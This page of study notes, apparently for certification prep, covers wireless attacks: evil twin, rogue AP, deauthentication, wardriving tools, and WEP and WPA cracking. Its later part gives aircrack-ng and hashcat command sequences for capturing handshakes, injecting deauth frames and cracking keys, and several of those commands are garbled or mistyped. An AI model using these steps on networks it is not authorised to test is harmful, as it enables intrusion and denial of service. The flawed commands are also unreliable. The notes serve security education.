wireless-networks Wireless threats and attacks Version: 1.0.2 On this page
Wireless threats and attacks Wireless threatsβ Access control attacks Evading access control measures such as Access Point MAC filters, port access control Integrity attacks Sending forged frames E.g. data frame injection, bit-flipping. Confidentiality attacks Intercepting confidential information transmitted over the network E.g. traffic analysis, session hijacking, MITM, etc... Availability attacks Attempting to prevent users from accessing WLAN resources. E.g. flooding, ARP poisoning, De-Authentication attacks Authentication attacks Misconfigured access point attack Accidents for configurations that you can exploit AD Hoc connection attack Connecting directly to another device via ad-hoc network. Not very successful as the other user has to accept connection Honeyspot access point attack Using multiple WLANs in area and use same SID. AP MAC spoofing MAC spoofing to mask an authorized client Jamming signal attack Jamming or blocking the wireless communication, causing a denial of service De-authentication attackβ Also known as deauthentication attack Used to capture the handshake traffic. Can also be used to DoS the client by continuously de-authenticating the device. Evil twin attackβ Also known as client mis-association π A rogue access point outside the place with the legitimate one E.g. can lure the employees of the organization to connect with it Can be done using Airsnarf Honeyspot attackβ Faking a well-known hotspot on a rogue AP E.g. as McDonald's or Starbucks free Wi-Fi spot Rogue Access Point Attackβ Fake AP with same SSID as legitimate one. Allows hijacking connections and acting as a middle man sniffing Differs from evil twin attack as it focuses on MITM instead of WiFi passwords. Sinkhole attackβ Compromised node tries to attract network traffic by advertise its fake routing update. Allows traffic to be directed away from its target. Can be used to launch other attacks like dropping or altering routing information. DNS sinkholeβ Also known as a sinkhole server Internet sinkhole Blackhole DNS DNS server that gives out a false result for a domain name. Used to attack on sensor/IoT device networks Can be prevented by owning own DNS server or hardcoding IP addresses. E.g. WannaCry malware was stopped spreading as a worm by Marcus Hutchins who discovered kill switch in the malware and Registering a domain name for a DNS sinkhole. Wireless hacking methodologyβ Wi-Fi Discovery GPS mapping List of discovered Wi-Fi networks Wireless Traffic Analysis Capture the packets to reveal any information (SSID, authentication method, ...) Launch Attacks E.g. ARP poisoning, MAC spoofing, De-Authentication, Rogue access point, MITM. Wireless discoveryβ Also known as Wi-Fi discovery Wardriving : Using a mobile vehicle to detect WiFi networksπ E.g. T.J. Maxx Data Theft where 45 million credit/debit card data was stolen because of weak WEP encryption. Also used: warbiking, warcycling, warwalking. Warchalking : drawing of symbols in public places to advertise an open Wi-Fi network.Tools such as WiFiExplorer, WiFiFoFum, OpenSignalMaps, WiFinderWIGLE: map for wireless networks NetStumbler : Windows tool to find networksKismet Wireless network detector, sniffer, and intrusion detection system. Works without sending any packets (passively) NetSurveyor : Windows tool similar to NetStumbler and KismetSilica : Discovers and shows vulnerabilities Wireless encryption attacksβ WEP crackingβ Weak IV (Initialization Vectors)Small Get reused frequently Are sent in clear text during transmission Can take a few seconds to discover the shared secret key. The goal is to collect as many IVs as possibleπ‘ Inject packets to speed it up π Can be cracked using Aircrack-ng:Listen to the trafficStart a compatible adapter with injection and sniffing capabilities airmon-ng start <interface-name> Start a sniffer to capture packetsairodump-ng --bssid <AP-MAC-address> -c 11 -w <output-file> <interface-name> Create more packets to escalate the process to collect more IVInject ARP traffic: aireplay-ng -3 -b 00::09:58:6F:64:1E -h 44:60:57:c8:58:A0 mon0 Run a cracking tool to extract encryption keys from the collected IVsaircrack-ng <output-file>.capDefault method is PTW (Pyshkin, Tews, Weinmann), other (older) supported methods include:FMS (Fluhrer, Mantin, Shamir) attacks: statistical techniques Korek attacks: statistical techniques Brute force Using separate tools for sniffing and cracking:Gathering packets through e.g. Wireshark or Prismdump Crack using e.g. WEPCrack , AirSnort , Aircrack-ng , and WEPLab WPA/WPA2 crackingβ Much more difficult than WEP Uses a constantly changing temporal key and user-defined password Key Reinstallation Attack (KRACK) Replay attack that uses third handshake of another device's session Most other attacks are simply brute-forcing the password that take a lof time. Sniffing 4-way handshakeβ 4-way handshake is the ceremony between AP and the device Vulnerability in WPA and WPA-Personal (WPA-PSK, pre-shared key) During WPA handshake, password is shared in encrypted form (called PMK (pairwise master key) ) Flow:Client tries to connect to an AP (access point)If the client is already connected then deauthentication attack can be used to disconnect the client and sniff when client is reconnecting. Grab packets while client goes through a 4-step process of authentication Crack WPA keys from recorded packetsCan be an offline attack e.g. utilizing a cloud virtual machine. E.g. using hashcat StepsRecording and deauthenticating using aircrack-ngπ€ Used often in movies as it looks cool airmon-ng start <interface-name> to create a new interface and enable monitor modeairmon-ng <interface-name> to list access points with BSSID, encryption (WPA2 etc.) and more.airmon-ng -c2 -w capture -d <BSSID> <interface-name> to listenShows each client MAC and logs their traffics notifying handshakes. airplay-ng -deauth 100 -a <BSSID> -c <client-MAC> <interface-name> to inject packets to de-authenticate the client Crack the password using hashcatConvert log files from airmon-ng from .cap to .hccapx using e.g. an online tool Run hashcat.bin -a 3 -m 2500 converted-file.hccapx ?d?d?d?d?d-m 2500: hash mode for WPA-EAPOL-PBKDF2-a 3 ?d?d?d?d?d: attack mode: bruteforce with mask telling 5 any characters. More secure against sniffing, brute force and WPS attacks. However has implementation bugs that can be exploited using: Aircrack-ngβ π Sniffer, detector, traffic analysis tool and a password cracker Official webpage | Source code Uses dictionary attacks for WPA and WPA2.Other attacks are for WEP only Cain and Abelβ